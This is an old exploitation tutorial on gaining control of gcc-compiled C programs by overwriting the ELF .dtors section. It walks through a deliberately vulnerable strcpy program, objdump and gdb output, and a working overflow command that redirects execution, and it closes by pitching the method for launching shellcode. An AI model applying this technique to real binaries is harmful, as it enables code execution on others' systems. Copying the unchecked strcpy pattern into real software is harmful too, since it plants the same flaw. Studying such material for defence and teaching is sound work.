-------------------------------------------------------------------------------
Overwriting the .dtors section.
by Juan M. Bello Rivas <rwxrwxrwx@synnergy.net>
-------------------------------------------------------------------------------
Introduction
------------
This paper presents a concise explanation of a technique to gain
control of a C program's flow of execution given that it has been compiled with
gcc. This text assumes that the reader is familiar with general overflow
techniques and the ELF format.
Thanks
------
ga and dvorak for interesting discussion.
Overview
--------
gcc provides several types of attributes for functions, particularly
there are two which will be of special interest for us: constructors and
destructors. These attributes should be specified by the programmer in a way
similar to this:
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
Functions with the `constructor' attribute will be executed before
main() while those declared with the `destructor' attribute will be executed
just _after_ main() exits.
In the produced ELF executable image this will be represented as two
different sections: .ctors and .dtors. Both of them will have the following
layout:
0xffffffff <function address> <another function address> ... 0x00000000
NOTE: If you want to really know everything about this I recommend you
to launch your favourite editor on gcc-2.95.2/gcc/collect2.c
From this point there are several things to take into account:
* .ctors and .dtors will be mapped in memory in the process' address
space and will be writable by default.
* These sections won't go away after a normal strip(1) of the binary.
* We don't care whether the programmer has set up any function as
either a constructor or destructor because both sections will appear anyway and
be mapped in memory.
The gory details
----------------
It's perhaps time to demonstrate the previous statements. There we
go...
$ cat > yopta.c <<EOF
#include <stdio.h>
#include <stdlib.h>
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
int
main(int argc, char *argv[])
{
printf("start == %p\n", start);
printf("stop == %p\n", stop);
exit(EXIT_SUCCESS);
}
void
start(void)
{
printf("hello world!\n");
}
void
stop(void)
{
printf("goodbye world!\n");
}
EOF
$ gcc -o yopta yopta.c
$ ./yopta
hello world!
start == 0x8048480
stop == 0x80484a0
goodbye world!
$ objdump -h yopta
.
.
.
14 .data 0000000c 08049558 08049558 00000558 2**2
CONTENTS, ALLOC, LOAD, DATA
15 .eh_frame 00000004 08049564 08049564 00000564 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .ctors 0000000c 08049568 08049568 00000568 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .dtors 0000000c 08049574 08049574 00000574 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .got 00000024 08049580 08049580 00000580 2**2
CONTENTS, ALLOC, LOAD, DATA
.
.
.
$ objdump -s -j .dtors yopta
yopta: file format elf32-i386
Contents of section .dtors:
8049574 ffffffff a0840408 00000000 ............
As we can see the address of stop() is stored in the .dtors as it was
previously said. Our aim here is the exploitation of a program, thus we will
forget from now on about .ctors since we'll not be able to do anything useful
with it.
We'll try now with a normal program without these function attributes:
$ cat > bleh.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
static void bleh(void);
int
main(int argc, char *argv[])
{
static u_char buf[] = "bleh";
if (argc < 2)
exit(EXIT_FAILURE);
strcpy(buf, argv[1]);
exit(EXIT_SUCCESS);
}
void
bleh(void)
{
printf("goffio!\n");
}
EOF
$ gcc -o bleh bleh.c
$ ./bleh
$ objdump -h bleh
.
.
.
17 .dtors 00000008 0804955c 0804955c 0000055c 2**2
CONTENTS, ALLOC, LOAD, DATA
.
.
.
Good! .dtors is still there even when there are no functions flagged as
destructors. Now we take a look at its contents:
$ objdump -s -j .dtors bleh
bleh: file format elf32-i386
Contents of section .dtors:
804955c ffffffff 00000000 ........
Only the head and tail tags are present but there are no function
addresses specified.
Maybe it seems odd to see buf declared as both static and initialized.
By doing so we make it be stored in the .data section which is very near to
our target .dtors section. Thus we'll be able to reach our objective easily by
overflowing buf. This is not the only avenue we can take to write into that
place, virtually every method you can come up with to write into the process'
address space will be useful (format string attack, direct strcpy by returning
into libc, corrupting a malloc chunk, ...) The one used here was chosen due to
its simplicity.
The goal now is to be able to execute the code present in bleh() (which
never gets called under normal conditions) by making an entry in .dtors that
points to it. We must leave the head tag alone and overwrite the tail tag (the
0x00000000) to achieve it.
$ objdump --syms bleh | egrep 'text.*bleh'
080484b0 l F .text 0000001a bleh
So as we can see bleh() is placed at 0x080484b0. It's time for an
exploit.
$ ./bleh `perl -e 'print "A" x 24; print "\xb0\x84\x04\x08";'`
goffio!
Segmentation fault (core dumped)
The test worked as we expected, but perhaps it is better to double
check and see the corpse of our process and what was changed.
$ gdb bleh core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
Core was generated by `./bleh AAAAAAAAAAAAAAAAAAAAAAAA°
'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x40013ed8 in ?? ()
(gdb) bt
#0 0x40013ed8 in ?? ()
#1 0x8048521 in _fini ()
#2 0x4003c25a in exit (status=0) at exit.c:57
#3 0x80484a3 in main ()
#4 0x400339cb in __libc_start_main (main=0x8048460 <main>, argc=2, argv=0xbfff
f8a4, init=0x80482e0 <_init>,
fini=0x804850c <_fini>, rtld_fini=0x4000ae60 <_dl_fini>, stack_end=0xbffff8
9c) at ../sysdeps/generic/libc-start.c:92
(gdb) maintenance info sections
Exec file:
`/home/rwx/tmp/bleh', file type elf32-i386.
.
.
.
0x0804953c->0x08049550 at 0x0000053c: .data ALLOC LOAD DATA HAS_CONTENTS
0x08049550->0x08049554 at 0x00000550: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
0x08049554->0x0804955c at 0x00000554: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x0804955c->0x08049564 at 0x0000055c: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x08049564->0x0804958c at 0x00000564: .got ALLOC LOAD DATA HAS_CONTENTS
.
.
.
Now we want to examine what was overwritten.
(gdb) x/x 0x08049550
0x8049550 <force_to_data>: 0x41414141
These are the contents of the .eh_frame (used by gcc to store the
exception handler pointers for languages that support them).
(gdb) x/x 0x08049554
0x8049554 <__CTOR_LIST__>: 0x41414141
(gdb) x/8x 0x0804955c
0x804955c <__DTOR_LIST__>: 0x41414141 0x080484b0 0x08049500
0x40013ed0
0x804956c <_GLOBAL_OFFSET_TABLE_+8>: 0x4000a960 0x400fb550 0x08048
336 0x400338cc
(gdb)
As we can see, we didn't take any care as to place the 0xfffffff head
tag in it's appropriate place and it turned out not to be needed at all, just
by putting bleh()'s address into the right position we made the code be
executed. We can also notice that the process segfaults after _fini(), this is
obviously because it keeps searching for the non-existent tail tag (0x00000000)
and jumping into every address just after ours (those found in the Global
Offset Table).
Conclusion
----------
An alternative way to launch an injected piece of shellcode has been
shown. The technique provides some advantages:
* If the target binary is readable by the attacker it will be very
easy to determine the exact position where we want to write and point to our
shellcode, just by analyzing the ELF image and determining .dtors position will
be enough. In this circumstance the reliability of the exploit is usually
drastically increased.
* It is simpler than other techniques like overwriting an entry in the
Global Offset Table.
...and disadvantages:
* Requires that the victim program has been compiled and linked with
GNU tools.
* Under some circumstances it may be difficult to find a place to store
the shellcode until the program exit()s.
Have fun! :)